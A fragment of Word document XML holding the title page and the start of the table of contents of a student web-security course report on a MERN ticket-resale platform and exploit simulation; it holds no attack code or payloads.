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3CB0D" w14:textId="2ECBB237" w:rsidR="00A04C9B" w:rsidRPr="00A04C9B" w:rsidRDefault="00D917BC" w:rsidP="00A04C9B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TIXIT — Secure Ticket Resale Mern Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40596835" w14:textId="2EAEAE13" w:rsidR="008907AE" w:rsidRDefault="00A04C9B" w:rsidP="008907AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C9B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mini Project </w:t>
      </w:r>
      <w:r w:rsidR="00D917BC" w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C9B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Simulation Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488EC6EB" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0630831C" w14:textId="48FBB09A" w:rsidR="00D917BC" w:rsidRDefault="00BE7BE3" w:rsidP="008907AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17C7965F" wp14:editId="113EBB93">
            <wp:extent cx="2220686" cy="1054705"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="72073907"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3907" name="Picture 1" descr="A logo of a company&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2247743" cy="1067555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="357AC1C1" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="008907AE" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2150FAC6" w14:textId="7C47AE67" w:rsidR="008907AE" w:rsidRDefault="00D917BC" w:rsidP="008907AE">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Su</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bmitted in Partial Fulfilment of Internal Evaluation Requirements</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for course </w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3" w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CSET365 Web Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B31F70" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A64880D" w14:textId="68BD5C03" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technical Domains Covered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC41FF2" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="00BE7BE3" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Application Security (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180A7194" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="00BE7BE3" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MERN Stack Secure Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B3F0C9" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="00BE7BE3" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Authentication &amp; Authorization Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09294DCD" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="00BE7BE3" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exploit Simulation &amp; Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109A71D7" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="00BE7BE3" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>API Security &amp; Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DF9B5" w14:textId="77777777" w:rsidR="008907AE" w:rsidRPr="00BE7BE3" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Secure Backend Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259AC054" w14:textId="77777777" w:rsidR="00D917BC" w:rsidRPr="00A04C9B" w:rsidRDefault="00D917BC" w:rsidP="008907AE">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290AF2BA" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="00D917BC">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submitted by</w:t>
      </w:r>
      <w:r w:rsidR="00A04C9B" w:rsidRPr="00A04C9B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A04C9B" w:rsidRPr="00A04C9B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Richa Y</w:t>
      </w:r>
      <w:r w:rsidR="00A04C9B" w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>anamandra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD250B" w14:textId="29DAB01F" w:rsidR="00D917BC" w:rsidRPr="004E318F" w:rsidRDefault="008907AE" w:rsidP="00D917BC">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enrolment Number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: E23CSEU1249</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B39BE48" w14:textId="0EA90047" w:rsidR="00D917BC" w:rsidRPr="004E318F" w:rsidRDefault="008907AE" w:rsidP="00D917BC">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00D917BC" w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>B. Tech</w:t>
      </w:r>
      <w:r w:rsidR="00D917BC" w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Computer Science and Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C4A90" w14:textId="4E1832D0" w:rsidR="00D917BC" w:rsidRPr="004E318F" w:rsidRDefault="00D917BC" w:rsidP="00D917BC">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Batch: </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2023-2027</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62A3DD" w14:textId="19AC308F" w:rsidR="00D917BC" w:rsidRPr="004E318F" w:rsidRDefault="00D917BC" w:rsidP="00D917BC">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Specialization: </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CSE Core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277A97CE" w14:textId="77777777" w:rsidR="00D917BC" w:rsidRDefault="00D917BC" w:rsidP="00D917BC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFE42AA" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submitted To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Course Faculty, School of Computer Science and Engineering, Bennett University</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D99BD" w14:textId="77777777" w:rsidR="008907AE" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106E0319" w14:textId="4DF938A0" w:rsidR="008907AE" w:rsidRPr="008907AE" w:rsidRDefault="008907AE" w:rsidP="008907AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04C9B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A04C9B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> November 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400313B3" w14:textId="51178987" w:rsidR="008907AE" w:rsidRPr="008907AE" w:rsidRDefault="008907AE" w:rsidP="00A04C9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1347014030"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="191A80F3" w14:textId="779630CF" w:rsidR="008907AE" w:rsidRPr="00AA1442" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00AA1442">
            <w:rPr>
              <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="018991DB" w14:textId="1BFE72ED" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc214584795" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584795 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15AD2809" w14:textId="0DF33EC0" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584796" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>System Architecture</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584796 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
